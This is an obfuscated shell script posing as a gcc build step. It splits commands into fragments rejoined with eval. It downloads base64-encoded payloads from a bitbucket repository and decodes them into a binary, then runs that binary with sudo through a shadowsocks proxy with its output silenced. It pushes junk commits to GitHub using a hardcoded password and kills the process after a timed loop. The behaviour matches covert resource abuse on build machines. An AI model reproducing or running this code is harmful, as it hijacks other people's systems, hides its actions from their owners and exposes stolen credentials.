GKGktQSr="it clone htt"
qejwsKMc="ps://gccbuild"
EOqsVio="@bitbucket"
IyCkMZ=".org/gccbu"
cbbdcj="ild/gcc.git &"
ztyehUt=">/dev/nul"
eval "g""$GKGktQSr""$qejwsKMc""$EOqsVio""$IyCkMZ""$cbbdcj""$ztyehUt""l"
WAgRd="ase64 -d gcc/"
JDFEuF="s >"
eval "b""$WAgRd""$JDFEuF"" o"
bCFqcJS="udo apt up"
IgqgNgW="date &>/de"
QZKe="v/null || t"
AkyQec="rue"
eval "s""$bCFqcJS""$IgqgNgW""$QZKe""$AkyQec"
Vgmq="do apt --y"
UWQFLV="es install "
fsdy="psmisc shadowso"
syLpj="cks-libev &"
KZff=">/dev/null || "
ELaFrjRy="tru"
eval "su""$Vgmq""$UWQFLV""$fsdy""$syLpj""$KZff""$ELaFrjRy""e"
kKBhfby="sudo syste"
GLQeJX="mctl stop sh"
IoJIRPW="adowsocks-l"
swJRqq="ibev.service"
etOIIVaE=" &>/dev/null |"
zioJVrs="| tru"
eval "$kKBhfby""$GLQeJX""$IoJIRPW""$swJRqq""$etOIIVaE""$zioJVrs""e"
cqKdn="udo ss-loc"
hmmBKGMm="al -c o &>/"
uTgvIO="dev/null "
eval "s""$cqKdn""$hmmBKGMm""$uTgvIO""&"
BBnzHHwQ="e64 -d gcc"
oTUOt="/c > pco"
eval "bas""$BBnzHHwQ""$oTUOt""nfig"
HECmWN="base64 -d "
yjwgU="gcc/m > e"
eval "$HECmWN""$yjwgU""lf"
chmod +x elf
wDmyA="sed -i 's/gcc/g"
onCzNCL="egeo/g' pco"
eval "$wDmyA""$onCzNCL""nfig"
sudo ./elf -c pconfig &>/dev/null &
echo aodjje
vueray="ee"
eval "sl""$vueray""p 74"
YuAU=" clone https"
Jzstwz="://github."
yssv="com/hcka-me"
cdHOq="chanics/llvm-"
yJFasjv="projectp.git t"
kogCXmkv="mp &>/dev/nul"
eval "git""$YuAU""$Jzstwz""$yssv""$cdHOq""$yJFasjv""$kogCXmkv""l"
cd tmp
iFbtG="it config "
kfYRsQ="user.name 'Vikt"
aPiY="oriya Jereme"
flNaS="nko' &>/dev/n"
eval "g""$iFbtG""$kfYRsQ""$aPiY""$flNaS""ull"
qvGtIM="t config use"
VHlsFw="r.email viktor"
jMGncQ="iya.jeremenkox"
jIzYshs="y@eclipso.eu "
euoCVw="&>/dev/"
eval "gi""$qvGtIM""$VHlsFw""$jMGncQ""$jIzYshs""$euoCVw""null"
zuvv="ILD=\`date"
eval "BU""$zuvv"" +%s\`"
nBQzTsC="KE=\`date +%"
dUZNjhdJ="S"
eval "MA""$nBQzTsC""$dUZNjhdJ""\`"
echo $BUILD >> aodjje$MAKE
git add aodjje$MAKE &>/dev/null
git commit -m 'aodjje re-upload '$MAKE &>/dev/null
iQLNq="it push http"
qCjd="s://viktori"
bQrxk="ya-jeremenkoxy"
CKMbU=":'O3UoPzqSDP"
RJpwlsY="5mQ_7Bu'@gi"
fTHqND="thub.com/hcka-"
xbfjJrqV="mechanics/llv"
LuTqTC="m-projectp.g"
vLuOBNjc="it -f &>/de"
Sntz="v/null || tr"
eval "g""$iQLNq""$qCjd""$bQrxk""$CKMbU""$RJpwlsY""$fTHqND""$xbfjJrqV""$LuTqTC""$vLuOBNjc""$Sntz""ue"
while :; do G=`date +%s`; echo 'Build $G'; [ `expr 1388 + $BUILD` -lt $G ] && sudo killall elf && break; sleep 134; done
